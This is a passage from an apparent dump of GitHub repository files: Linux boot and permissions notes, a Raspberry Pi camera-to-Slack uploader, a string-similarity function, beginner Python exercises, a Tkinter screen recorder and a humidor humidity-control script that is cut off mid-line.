"text": "\n# Phases of the boot process\nBootstrapping means \"starting up a computer\". During bootstrapping the kernel is loaded into memory and begining to execute.\n- reading of the bootloades from the MBR(master boot record)\n- loading & initialization of the kernel\n- device detection & configuration\n- creation of kernel process\n- administrator intervention (single-user mode onluy)\n- execution of the system startup scripts\n\nThe kernel is itself a program and the first bootstrappping task is to get this program into memory so that it can be executed.\n/unix or /vmunix <-> /boot/vmlinuz\n\n## Schema of bootstraping\n BIOS -> MBR -> GRUB -> Kernel -> Init Process -> Runlevels\n \n# Reboots&Runlevels\n telinit X - change init level;X is number of runlevel \n init X - change init level;X is number of runlevel\n whoami - check user \n runlevel - check runlevel\n shutdown -r now - reboot the computer\n\n## Runlevels\n- 0 Halt\n- 1 Singe-user mode\n- 2 Multi-user with partial services\n- 3 Full multi-user with networking (text mode)\n- 4 Not used\n- 5 Full multi-user graphical mode (provides a GUI desktop login)\n- 6 Reboot\n\n##Some kernel processes on Linux systems\n- kjournald - commits filesystem journal updates to disk\n- kwsapd - swaps processes wen physical memory is low\n- ksoftirqd - handles soft interrupt if they can't be dealt with context swich time\n- khubd - configures USB devices\n\n- fstab or vfstab - files determine how the filesystem should be mount\n- fsck - this command check & repair filesystem\n\n\n# renicing and killing rouge processes ->nice level\n* -20 highest priority\n* 0 normal, default\n* 19 lowest priority\n\n# Prmissions\n```chmod```<br />\n```d _ _ _ _ _ _ _ _ _ filename ```<br />\n```user group other```<br />\nr = 4 w = 2 x = 1 <br />\n```chmod u+x file``` <br />\n```chmod ugo -w file``` <br />\n```chmod 555 file``` <br />\n\n## SetUID, SetGID, and Sticky Bits\nSUID = 4 SGID = 2 sticky bit = 1 <br />\nSUID - rws rwx rwx ```chmod u+s file```<br />\nSGID - rwx rws rwx ```chmod g+s file```<br />\nstickybit -rwx rwx rwt ```chmod o+t file```<br />\n\n\n* *SUID*<br />\nfile - allows executable binnary to run with permission of owner<br />\nfolder - no effect<br />\n* *SGUID*<br />\nfile - same as SUID but with group permission<br />\nfolder - new files in folder make on matching group ownership<br />\n* *sticky bit*<br />\nfile - no effect<br />\nfolder - fildes within can only be deleted or renamed by owner or root<br />\n\n# command **STDIN STDOUT STDERR**\nSTDIN - comes from keyboard<br />\nSTDOUT - goes to console<br />\nSTDERR - cose to console<br />\n\n* Not all commands listen for STDIN\n\n* 0< redirect STDIN <br />\n* 1> redirect STDOUT <br />\n* 2> redirect STDERR <br />\n* '|' pipe resolts into STDIN of a command <br />\n* '>>' this will append instead of everwriting <br />\n* & used if redirecting STDERR into STDOUT or vice versa <br />\n\n# Cron & Time services <br />\nCRON - command run on (/etc)\n* runns in 3 ways:<br />\n\t1. cron.hourly, cron.daily , cron.monthly, cron.weekly <- root<br />\n\t2. /etc/crontab <- specify user which run this cron<br />\n\t\t/etc.cron.d/*<br />\n\t3. personal crontab <- user<br />\n```crontab -e``` -> edit crontab<br />\n```crontab -l``` -> check cron on current user<br />\n\n## Example of job definition:<br />\n```\n#.---------------- minute (0 - 59)\n#| .------------- hour (0 - 23)\n#| | .---------- day of month (1 - 31)\n#| | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n#| | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n#| | | | |\n#* * * * * user-name command to be executed\n```\n\n\n* **can be**<br />\n*/5 every 5<br />\n2,3,6 only 2,3,6<br />\n3-10 from 3 to 10<br />\n\n# SELinux\n* Good - standart posix permissions\n* Better - ACLs\n* Best - SELinux\nSELinux:\n- stops foot - shoooting\n- limits application's ability\n- manage by port, app\nPRO TIP\nIf you've configured thing correctly, but stuff doesn't work, look for SELinux issues\n/etc/syssconfig/selinux\nSELINUX modes:\n- enforcing -> enacts rules\n12/54- permissive -> logs violations, but doesnt stop them\n- disabled -> turned off\nContect lables:\n- default SELinux mode is \"targeted\"\n- files, folders, process, ports are labeled according the access required to access them\nshow contexts: ls -Z; ps -Z; netstat -Z\nchanging contexts\nchcon -t type file/folder\nrestorecon -vR /var/www\nNOTE - contexts are inherited like permissions and ACLs . So cp is often more effective than mv\n/etc/log/audit -> logs about selinux\nyum install setroubleshoot-server ->this packet help to see humanreadable format in selinux\nservice restart audit\nsealert -l\nSELinux booleans\ngetsebool -a -> show all possible (grep is useful here)\nsetsebool [-P] booloption on/off (1/0)\n/etc/selinux/targeted/modules/active/booleans.local\n"
}
] | 11 |
superservice-international/nightvision-camera | https://github.com/superservice-international/nightvision-camera | 2d077768887eaa84524a729c4c4b6a79daeb55df | a8116216845b2acb9ea3bbd730d221e3798773ba | 5f6558ef9d6d130202a14d5a87d1c1f9c9045e70 | refs/heads/master | 2020-05-28T07:13:33.944869 | 2017-10-27T09:53:15 | 2017-10-27T09:53:15 | 33,070,097 | 0 | 0 | null | 2015-03-29T11:08:59 | 2017-03-06T16:30:45 | 2017-10-27T09:53:16 | Python | [
{
"alpha_fraction": 0.5819520950317383,
"alphanum_fraction": 0.5870165824890137,
"avg_line_length": 25.814815521240234,
"blob_id": "a00b3366f6a119ac43426d5c402ec2a26859b002",
"content_id": "cdb11b7eaef6d35224b5f44edc5df6561c18159c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2172,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 81,
"path": "/take_picture.py",
"repo_name": "superservice-international/nightvision-camera",
"src_encoding": "UTF-8",
"text": "import picamera\nimport time\nimport datetime\nimport os\nimport requests\nfrom PIL import Image\n\n\ndef take_picture():\n now = datetime.datetime.now()\n now_str = now.strftime('%Y-%m-%d_%H-%M-%S')\n path = os.path.dirname(os.path.abspath(__file__))\n file_name = path + \"/\" + now_str + '.jpg'\n with picamera.PiCamera() as camera:\n camera.resolution = (1024, 768)\n time.sleep(2)\n camera.capture(file_name)\n print(file_name + \" taken\")\n return file_name\n\n\ndef reduce_filezise(file_name):\n im = Image.open(file_name)\n im.save(file_name, 'JPEG', quality=90)\n\n\nclass TokenAuth(requests.auth.AuthBase):\n def __call__(self, r):\n token = 'Token %s' % os.environ.get('API_TOKEN')\n r.headers['Authorization'] = token\n return r\n\n\ndef post_picture(file_name):\n host = os.environ.get('API_URL')\n\n query = \"?query=mutation{postPicture(input: {}){success errors clientMutationId}}\"\n\n print(\"now posting \" + file_name)\n post = requests.post(\n url=host + query,\n auth=TokenAuth(),\n files={'image': open(file_name, 'rb')}\n )\n result = post.json()['data'].get('postPicture')\n if result:\n return result.get('success', False)\n\n\ndef post_picture_slack(file_name):\n token = os.environ.get('SLACK_TOKEN')\n with open(file_name, 'rb') as pic:\n response = requests.post(\n url=\"https://slack.com/api/files.upload\",\n data={'token': token, 'channels': 'horsebot'},\n files={'file': pic}\n )\n return response.json().get('ok', False)\n\n\ndef delete_picture(file_name):\n print(\"now deleting \" + file_name)\n os.remove(file_name)\n\n\ndef post_remaining():\n path = os.path.dirname(os.path.abspath(__file__))\n for pic in os.listdir(path):\n if pic.split('.')[-1] == 'jpg':\n post = post_picture_slack('/'.join([path, pic]))\n if post:\n delete_picture('/'.join([path, pic]))\n\n\nif __name__ == \"__main__\":\n picture = take_picture()\n reduce_filezise(picture)\n posted = post_picture_slack(picture)\n if posted:\n delete_picture(picture)\n post_remaining()\n"
},
{
"alpha_fraction": 0.7366254925727844,
"alphanum_fraction": 0.748971164226532,
"avg_line_length": 19.25,
"blob_id": "86cda3f45b43e817de2f67cd2c769231cf36f337",
"content_id": "ec8b9f42a178e82c2cbb2b1af6537475470c8e37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 243,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 12,
"path": "/README.md",
"repo_name": "superservice-international/nightvision-camera",
"src_encoding": "UTF-8",
"text": "# nightvision-camera\n\non the raspberry pi, this software requires:\n\n`sudo apt-get install python-dev`\n\n`sudo apt-get install python3.4-dev`\n\n`sudo apt-get install libjpeg8-dev`\n\n## misc\n* [mausberry](https://mausberry-circuits.myshopify.com/)\n"
},
{
"alpha_fraction": 0.6709956526756287,
"alphanum_fraction": 0.6796537041664124,
"avg_line_length": 12.588234901428223,
"blob_id": "05017705fbe8469937b63feaeb6864a5350e9390",
"content_id": "afefcd4bfa012b759c6b900add6f01086f71f2e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 231,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 17,
"path": "/Makefile",
"repo_name": "superservice-international/nightvision-camera",
"src_encoding": "UTF-8",
"text": "PYTHON := env/bin/python\nPIP := env/bin/pip\n\n.PHONY: build watch\n\nall: install\n\n$(PYTHON):\n\tvirtualenv -p python3.4 env\n\n$(PIP): $(PYTHON)\n\ninstall: $(PIP)\n\t$(PIP) install -r requirements.txt\n\npost:\n\tenv/bin/python take_picture.py\n"
},
{
"alpha_fraction": 0.6842105388641357,
"alphanum_fraction": 0.7894737124443054,
"avg_line_length": 8.5,
"blob_id": "5c8ca2d64acdec9361278818fd82b8d7945ba4f1",
"content_id": "d09870a546013f3aa68d09390b28963bed6b73b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 38,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 4,
"path": "/requirements.txt",
"repo_name": "superservice-international/nightvision-camera",
"src_encoding": "UTF-8",
"text": "picamera\nrequests==2.13.0\nPillow\nipdb\n"
}
] | 4 |
arrzdev/SimilarityAlgorithm | https://github.com/arrzdev/SimilarityAlgorithm | c5f6e87dae12c8649063e1ae7e1dcf1cbb490a1e | eafb9930fc150177bc59dd8dd1651296f8fa7eb8 | 57fe310198b193853b15b8f4625c23c125f1820e | refs/heads/main | 2023-03-30T01:52:40.245851 | 2021-04-09T13:01:13 | 2021-04-09T13:01:13 | 356,267,259 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5869886875152588,
"alphanum_fraction": 0.603745698928833,
"avg_line_length": 30.703125,
"blob_id": "d01ea03d126694298661f4d4032e09758f191d61",
"content_id": "d23eddcd50fff125dc8b60cfe80e2dfd76b3ed5a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2029,
"license_type": "permissive",
"max_line_length": 104,
"num_lines": 64,
"path": "/algo.py",
"repo_name": "arrzdev/SimilarityAlgorithm",
"src_encoding": "UTF-8",
"text": "import unidecode\n\n'''\nAlgorithm made by ARRZ.DEV\nThanks <3\n'''\n\ndef similarity_algo(string1, string2): #returns a probability\n if not string1 or not string2:\n return 'missing parameter'\n\n def sort_funct(string): #function to sort each word by a 'unique' id\n id_ = 0\n\n for letter in string: #add to the id the ordinal of each letter in that string\n id_ += ord(letter)\n\n #this is to make it even more 'unique' --\n id_ += ord(string[0]) #add to the id the ordianal of the first letter in that string\n id_ += len(string) #add to the id the lenght of the string\n \n return id_\n\n #normalize both strings\n string1 = unidecode.unidecode(string1).lower().strip()\n string2 = unidecode.unidecode(string2).lower().strip()\n\n #create both 'words' dictionary's\n string1Words = sorted(string1.split(), key=sort_funct)\n string2Words = sorted(string2.split(), key=sort_funct)\n\n #calculate the max score and the score per letter\n max_score = (5*len(string1Words))\n score_per_letter = max_score/len(\"\".join(string1Words))\n\n #init score as 0\n score = 0\n\n for word_index in range(len(string1Words)):\n try:\n\n if string2Words[word_index] == string1Words[word_index]:\n score += len(string2Words[word_index])*score_per_letter\n\n else: #if the word isnt 100% equal divide in letters and test it!\n #loop trough letters\n\n for letter_index in range(len(string1Words[word_index])):\n #print(f'L: {string1Words[word_index][letter_index]}')\n\n if string2Words[word_index][letter_index] == string1Words[word_index][letter_index]:\n score += score_per_letter\n\n else:\n #add the penalty here for each letter\n pass\n\n except:\n pass\n\n #calculate the similarity %% (probability)\n probability = (score/max_score) * 100\n\n return probability\n"
},
{
"alpha_fraction": 0.760765552520752,
"alphanum_fraction": 0.7639553546905518,
"avg_line_length": 38.1875,
"blob_id": "499d43ef21c5ed234551393e0776e67befe1e3f2",
"content_id": "6d2fd646dfc88c517b1b3b838d53210d4271d508",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 627,
"license_type": "permissive",
"max_line_length": 244,
"num_lines": 16,
"path": "/README.md",
"repo_name": "arrzdev/SimilarityAlgorithm",
"src_encoding": "UTF-8",
"text": "# SimilarityAlgorithm\nA algorithm to find the similarity between to given strings.\n\n\n## About\nThis is the 3rd and last version of my algorithm\n\nI made this algorithm for my project \"KahootBot\". This algorithm proved to be the best among many (cosine, jaccard, levenshtein) to meet the needs I had, however this does not mean that in other circumstances my algorithm is in fact \"the best\".\n\n## Penalty\nIn the algo there is a else statement with a penalty comment... there you can add a penalty for each wrong letter (in case you need that)\n\nPenalty Example: ( score -= score_per_letter/2 )\n\n## Hope this can be usefull\narrz.dev\n"
}
] | 2 |
subhankarbehera/python | https://github.com/subhankarbehera/python | d2091fb9cf0bf4894dd058390e801678b70c7100 | 25c57abda91775fc60140e14a9a9621e4bd898c7 | 509b6e1de23756620b3949f2ee4b346b1c8cf27c | refs/heads/main | 2023-02-06T00:54:51.665210 | 2020-12-28T07:17:02 | 2020-12-28T07:17:02 | 321,564,385 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6338028311729431,
"alphanum_fraction": 0.6338028311729431,
"avg_line_length": 22,
"blob_id": "a468d1c065256faff2ecac073896d47c1f42ea37",
"content_id": "67438dba23431283d71c4a9ab1250995a996b61e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 71,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 3,
"path": "/loop 1.py",
"repo_name": "subhankarbehera/python",
"src_encoding": "UTF-8",
"text": "mylist = {\"one\",\"two\",\"three\"}\nfor number in mylist:\n\tprint(number);\n\t\n"
},
{
"alpha_fraction": 0.46666666865348816,
"alphanum_fraction": 0.6000000238418579,
"avg_line_length": 8,
"blob_id": "60295ebc39ff2e5879cfa69fbb1f457148e5b418",
"content_id": "4177ce77dc6e423eb65e4787f4658d1a62eb0746",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 45,
"license_type": "permissive",
"max_line_length": 11,
"num_lines": 5,
"path": "/addition.py",
"repo_name": "subhankarbehera/python",
"src_encoding": "UTF-8",
"text": "x=19\ny=20.35\nprint(x);\nprint(y);\nprint(x+y);\n"
},
{
"alpha_fraction": 0.38181817531585693,
"alphanum_fraction": 0.4909090995788574,
"avg_line_length": 8.166666984558105,
"blob_id": "b7107041e82c594b45015629b2ccfc8b2fe01b8a",
"content_id": "38916ac27f373ef3b6650d026cb650b4b2521d73",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 55,
"license_type": "permissive",
"max_line_length": 11,
"num_lines": 6,
"path": "/new script.py",
"repo_name": "subhankarbehera/python",
"src_encoding": "UTF-8",
"text": "i=\"I got\"\nj=\"100\"\nprint(i+j);\na=\"5\"\nb=\"13\"\nprint(a**);\n"
},
{
"alpha_fraction": 0.5609756112098694,
"alphanum_fraction": 0.5609756112098694,
"avg_line_length": 9.25,
"blob_id": "70405c5f6622e5328441519eeb367d5a52d99e95",
"content_id": "a02fd5ea23070c5e606a7c4a9f67a5956dad2317",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 41,
"license_type": "permissive",
"max_line_length": 10,
"num_lines": 4,
"path": "/variables.py",
"repo_name": "subhankarbehera/python",
"src_encoding": "UTF-8",
"text": "x=\"I AM A\"\ny=\"CODER\"\nprint(x);\nprint(y);\n"
},
{
"alpha_fraction": 0.53125,
"alphanum_fraction": 0.59375,
"avg_line_length": 19.33333396911621,
"blob_id": "049264f842c457acdea0fa7f4544b19b90306c3d",
"content_id": "da05538b08c05f6e976e4457014afe1b7b542058",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 64,
"license_type": "permissive",
"max_line_length": 34,
"num_lines": 3,
"path": "/hello.py",
"repo_name": "subhankarbehera/python",
"src_encoding": "UTF-8",
"text": "print(\"hello\");\nif 12>10:\n print(\"jay jawan jay kissan\");\n \n"
}
] | 5 |
Olivers11/Grabadora-Python | https://github.com/Olivers11/Grabadora-Python | 3539afe2cbc8de462e3a79e3c00ecb4fd6b0e94a | 8bb25e39aef57f762c55252ece12f6b2d7542e9d | d79225217d2467371ee9ff29945c107927e300d8 | refs/heads/master | 2022-11-21T09:19:55.205160 | 2020-07-15T16:55:46 | 2020-07-15T16:55:46 | 279,923,564 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6844614148139954,
"alphanum_fraction": 0.7075786590576172,
"avg_line_length": 29.194244384765625,
"blob_id": "dc71170d852a6d43993bb337e14e97daf50ae48c",
"content_id": "b8d0167d621161b9e6beb257094979eb890400f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4196,
"license_type": "no_license",
"max_line_length": 178,
"num_lines": 139,
"path": "/grabadora.py",
"repo_name": "Olivers11/Grabadora-Python",
"src_encoding": "UTF-8",
"text": "from tkinter import *\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nimport cv2\nimport ctypes\nimport glob\nimport numpy as np\nimport pyautogui\nimport threading\nimport os\n\n\n#Clase principal de la grabadora\n\n\nclass Grabadora:\n\n\tdef __init__(self, master):\n\t\t#|objeto para manejar ss|\n\t\tself.frame = master\n\t\tself.fourcc = cv2.VideoWriter_fourcc(*\"XVID\")\n\t\tself.hora = 0\n\t\tself.minutos = 0\n\t\tself.segundos = 0\n\t\tself.grabando = False #Esta variable nos dira si estamos grabando o no\n\t\tself.PintarInterfaz()\n\t\n\tdef LimpiarContadores(self):\n\t\t#Funcion que limpia todos los contadores |hora,minuto,segundos| al comenzar\n\t\tself.hora = 0\n\t\tself.minutos = 0\n\t\tself.segundos = 0\n\n\n\tdef FormatoHora(self, c):\n\t\t#Esta funcion nos da formato al medidor de tiempo\n\t\tif c < 10:\n\t\t\tc = \"0\"+ str(c)\n\t\treturn c\t\n\t\n\tdef ObtenerPantalla(self):\n\t\t#creamos una instancia del modulo ctypes \n\t\tpantalla = ctypes.windll.user32\n\t\tpantalla.SetProcessDPIAware()\n\t\t#Obtenemos las medidas de x(0) - y(1) por medio de nuestra instancia \n\t\ttamanio = pantalla.GetSystemMetrics(0), pantalla.GetSystemMetrics(1)\n\t\treturn tamanio\n\n\tdef Archivo(self, tex, ext):\n\t\tcount = 0\n\t\t#Este metodo verifica si existe un archivo con el mismo nombre\n\t\t#En el mismo directorio, si los hay, debemos colocar el mismo nombre\n\t\t#Pero colocarle el numero de archivo repetido que es: copia-copia2\n\t\tfor x in glob.glob('*'+ext):\n\t\t\tif tex in x:\n\t\t\t\tcount += 1\n\t\tif count > 0:\n\t\t\t#Si tenemos dos o mas concidencias de nombre agregamos el numero al nombre\n\t\t\tnombre = tex+\" \"+str(count)+ext\n\t\telse:\n\t\t\tnombre = tex+ext\n\t\t#Retornamos nombre\n\t\treturn nombre\n\n\n\tdef screen_shot(self):\n\t\t#Este metodo toma una fotografia y la guarda en el directorio\n\t\t#Para el nombre llamamos a nuestro metodo 'Archivo' y ver si es unico\n\t\t#O si tenemos mas archivos con el mismo nombre\n\t\tpyautogui.screenshot(self.Archivo('captura_pantalla', '.jpg'))\n\n\n\tdef Tiempo(self):\n\t\tself.time['text'] = str(self.FormatoHora(self.hora)) + str(self.FormatoHora(self.minutos)) + str(self.FormatoHora(self.segundos)) \n\t\tself.segundos += 1\n\t\tif self.segundos == 60:\n\t\t\tself.segundos = 0\n\t\t\tself.minutos += 1\n\t\tif self.minutos == 60:\n\t\t\tself.minutos = 0\n\t\t\tself.hora += 1\n\t\t#\t-DESFACE-\n\t\tself.proceso = self.time.after(886, self.Tiempo)\t\n\n\n\n\tdef EstadoGrabacion(self):\n\t\tif self.grabando == True:\n\t\t\tself.grabando = False\n\t\t\tself.time.after_cancel(self.proceso)\n\t\t\tself.LimpiarContadores()\n\t\telse:\n\t\t\tself.grabando = True\n\t\t\tself.btn_grabar.configure(text=\"Pausa\")\n\t\t\tt1 = threading.Thread(target= lambda:self.Grabar())\n\t\t\tt2 = threading.Thread(target=lambda:self.Tiempo())\n\t\t\tt1.start()\n\t\t\tt2.start()\t\n\n\n\tdef BuscarDirectorio(self):\n\t\tself.directorio = filedialog.askdirectory()\n\t\tif self.directorio != \"\":\n\t\t\tos.chdir(self.directorio)\n\n\n\n\tdef Grabar(self):\n\t\tself.salida = cv2.VideoWriter(self.Archivo(\"Video\", \".mp4\"), self.fourcc, 20.0,(self.ObtenerPantalla()))\n\t\twhile self.grabando == True:\n\t\t\timg = pyautogui.screenshot()\n\t\t\tframe_ = np.array(img)\n\t\t\tframe_ = cv2.cvtColor(frame_,cv2.COLOR_BGR2RGB)\n\t\t\tself.salida.write(frame_)\n\t\tself.btn_grabar.configure(text=\"Grabar\")\n\t\tself.salida.release()\t\n\n\n\n\n\tdef PintarInterfaz(self):\n\t\tself.label = Label(self.frame, relief=\"flat\", text=\"Grabadora de Pantalla\",bg=\"gray\", font=(\"\",\"15\"))\n\t\tself.label.pack(padx=10,pady=1)\n\t\tself.time = Label(self.frame, fg='black', width=22, text=\"00:00:00\", bg=\"gray\", font=(\"\",\"14\"))\n\t\tself.time.pack()\n\t\tself.btn_grabar = Button(self.frame,text=\"Grabar\", relief=\"ridge\", borderwidth=2, overrelief=\"flat\",bg=\"white\",fg=\"black\",width=8,command= lambda:self.EstadoGrabacion())#gray66\n\t\tself.btn_grabar.place(x=20,y=60, width=175)\n\t\tself.shoot = Button(self.frame,text=\"Capura de Pantalla\", relief=\"ridge\", borderwidth=2, overrelief=\"flat\",bg=\"white\",fg=\"black\",width=8,command= lambda:self.screen_shot())\n\t\tself.shoot.place(x=20,y=90, width=175)\n\t\tself.folder = Button(self.frame, text=\"Seleccionar Archivo\", relief=\"ridge\", borderwidth=2, overrelief=\"flat\",bg=\"white\",width=10,command= lambda:self.BuscarDirectorio())\n\t\tself.folder.place(x=20,y=120, width=175)\n\n\nroot = Tk()\nroot.geometry(\"220x170\")\nroot.config(bg=\"gray\")\nroot.title(\"Olsgrab\")\naplication = Grabadora(root)\nroot.mainloop()"
},
{
"alpha_fraction": 0.7207792401313782,
"alphanum_fraction": 0.7229437232017517,
"avg_line_length": 34.38461685180664,
"blob_id": "ae80675b69056a5b19135d0e37622732f8281251",
"content_id": "3c6651400665e979275479ed48978dafdf78bf02",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 462,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 13,
"path": "/README.md",
"repo_name": "Olivers11/Grabadora-Python",
"src_encoding": "UTF-8",
"text": "# Grabadora-Python\nCaptura pantalla de la PC con python\nrequerimienos:\n cv2\n glob\n numpy \n pyautogui\n ------------------------------\n Estos paquetes no vienen agregados a python, para tenerlos solo debes\n escribir en cmd -- pip install \"nombre del paquete\"\n Puedes agregarle formato al timer de igual manera en la funcion 'FormatoHora()'\n Para mejorar la interfaz debes, modificar los estilos y widgets en el metodo 'PintarInterfaz()'\n Dejame una estrella! :(\n \n"
}
] | 2 |
BrightlyTechnologies/HumidorPi | https://github.com/BrightlyTechnologies/HumidorPi | c7401c0e8e2cb99cac9fca7a8c49db79a1a90f3f | 1d685057f34c02439a08ce8b2186308d667e1517 | fdefaa68e6a9d0eb359bec451f4e06367746217a | refs/heads/master | 2020-03-17T02:10:44.226383 | 2017-05-13T21:22:09 | 2017-05-13T21:22:09 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5295315384864807,
"alphanum_fraction": 0.5412423610687256,
"avg_line_length": 28.53383445739746,
"blob_id": "e5bcdbdc34cbd7727539bbf8c0ebba1629194985",
"content_id": "97fc5b152fe6a7ac0365854f38f7a520cb58fd15",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3928,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 133,
"path": "/version1_0/humidorpi.py",
"repo_name": "BrightlyTechnologies/HumidorPi",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python\n\n#This script is deprecated!!!!\n\n##################################\n### Imports ###\n##################################\n\nimport json\nimport sys\nimport time\nimport datetime\nimport Adafruit_DHT\nimport os\nimport traceback\nfrom ISStreamer.Streamer import Streamer\n\n###################################\n### Sensor ###\n###################################\nDHT_TYPE = Adafruit_DHT.AM2302\nDHT_PIN = 4\n\n###################################\n### Variables ###\n###################################\nstreamer = Streamer(bucket_name=\"Humidor\", bucket_key=\"bucket-key-goes-here\", access_key=\"access-key-goes-here\")\nFREQUENCY_SECONDS = 30\nstaleHumidity = None\nstaleTemp = None\nfanControl = False\nhumControl = False\nmsgControl = 0\n\n####################################\n### CONTROL ###\n####################################\ncontrolHumidity = 80\n\n# Turn off the fan & humidifier\nos.system('ykushcmd -d 1')\nos.system('ykushcmd -d 2')\nstreamer.log(\"Fan\", \"OFF\")\nstreamer.log(\"Humidifier\", \"OFF\")\nstreamer.log(\"Status\", \"Idle\")\n# DO NOT POWER OFF 3 = WiFi Module!\n\nprint('Logging sensor measurements to ISS every {0} seconds.'.format(FREQUENCY_SECONDS))\nprint('Press Ctrl-C to quit.')\n\ntry:\n while True:\n if msgControl != 0:\n\t msgControl = 0\n streamer.log(\"My Messages\", \"Monitoring Humidity\")\n\telif msgControl == 0:\n\t streamer.log(\"My Messages\", \"Monitoring Humidity\")\n\n humidity, temp = Adafruit_DHT.read(DHT_TYPE, DHT_PIN)\n\n if humidity is None or temp is None:\n time.sleep(2)\n\t continue\n temp = round(temp * 1.8 + 32)\n humidity = round(humidity)\n\n if staleHumidity is None or staleTemp is None:\n staleHumidity = humidity\n\t staleTemp = temp\n\t print('H & T = None')\n\n print('Temperature: {0:0.1f} F'.format(temp))\n print('Humidity: {0:0.1f} %'.format(humidity))\n \n time.sleep(2)\n\n if humidity == staleHumidity:\n \t print('Humidity No Change - Skipping ISS Update')\n\t streamer.log(\"Status\", \"Skipped\")\n time.sleep(2)\n else:\n\t staleHumidity = humidity\n\t staleTemp = temp\n print('Sending to ISS')\n\t if msgControl != 1:\n\t msgControl = 1\n\t streamer.log(\"My Messages\", \"Received Update\")\n\t streamer.log(\"Humidity\", int(humidity))\n\t streamer.log(\"Temperature\", int(temp))\n\t time.sleep(2)\n\n if int(humidity) < int(controlHumidity):\n \t if fanControl != True and humControl != True:\n os.system('ykushcmd -u 1')\n os.system('ykushcmd -u 2')\n\t fanControl = True\n\t humControl = True\n\t streamer.log(\"Fan\", \"ON\")\n streamer.log(\"Humidifier\", \"ON\")\n\t if msgControl != 2:\n\t msgControl = 2\n\t streamer.log(\"Status\", \"Increasing Humidity\")\n elif int(humidity) > int(controlHumidity):\n\t if fanControl != True and humControl != False:\n os.system('ykushcmd -u 1')\n os.system('ykushcmd -d 2')\n\t fanControl = True\n\t humControl = False\n\t streamer.log(\"Fan\", \"ON\")\n streamer.log(\"Humidifier\", \"OFF\")\n\t if msgControl != 3:\n\t msgControl = 3\n\t streamer.log(\"Status\", \"Circulating Air\")\n else:\n\t if fanControl != False and humControl != False:\n os.system('ykushcmd -d 1')\n os.system('ykushcmd -d 2')\n\t fanControl = False\n\t humControl = False\n\t streamer.log(\"Fan\", \"OFF\")\n streamer.log(\"Humidifier\", \"OFF\")\n\t if msgControl != 4:\n\t msgControl = 4\n\t streamer.log(\"Status\", \"Idle\")\n\tstreamer.close()\n\ttime.sleep(FREQUENCY_SECONDS)\n\nexcept KeyboardInterrupt:\n\tprint \"Shutdown requested...exiting\"\n\tstreamer.close()\nexcept Exception:\n\ttraceback.print_exc(file=sys.stdout)\nsys.exit(0)\n"
},
{
"alpha_fraction": 0.5991877913475037,
"alphanum_fraction": 0.6103553175926208,
"avg_line_length": 31.189542770385742,
"blob_id": "da9d1dbf08e8d21d54396b127ffd736dc6a8843f",
"content_id": "03b54269cdd5978c08dfbc8eaf9a6ad0d8ba24e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4925,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 153,
"path": "/humidorpi.py",
"repo_name": "BrightlyTechnologies/HumidorPi",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python\n\n##################################\n### Imports ###\n##################################\n\nimport json\nimport sys\nimport time\nimport datetime\nimport subprocess\nimport traceback\nimport Adafruit_DHT\nfrom ISStreamer.Streamer import Streamer\n\n##################################\n### Sensor ###\n##################################\nDHT_TYPE = Adafruit_DHT.AM2302\nDHT_PIN = 4\n\n##################################\n### Variables ###\n##################################\nstreamer = Streamer(bucket_name=\"Humidor\", bucket_key=\"bucket-key-goes-here\", access_key=\"access-key-goes-here\", buffer_size=200, debug_level=1)\nFREQUENCY_SECONDS = 300\nstaleHumidity = None\nstaleTemp = None\nstatusControl = 0\n\n##################################\n### CONTROL ###\n##################################\ncontrolHumidity = 80\n\n# Turn on the fan & turn off the humidifier\nsubprocess.call(\"ykushcmd -u 1\", shell=True)\nsubprocess.call(\"ykushcmd -u 2\", shell=True)\n\nprint('Logging sensor measurements to ISS every {0} seconds.'.format(FREQUENCY_SECONDS))\nprint('Press Ctrl-C to quit.')\n\nprint('entering main try')\ntry:\n\tprint('entering main while loop')\n\tprint(time.strftime('%a %H:%M:%S'))\n\tstreamer.log(\"My Messages\", \"Starting Main Loop\")\n\ttime.sleep(5)\n\twhile True:\n\t\tprint('posting Monitoring Humidity')\n\t\tprint('retrieving humidity')\n\t\tprint(time.strftime('%a 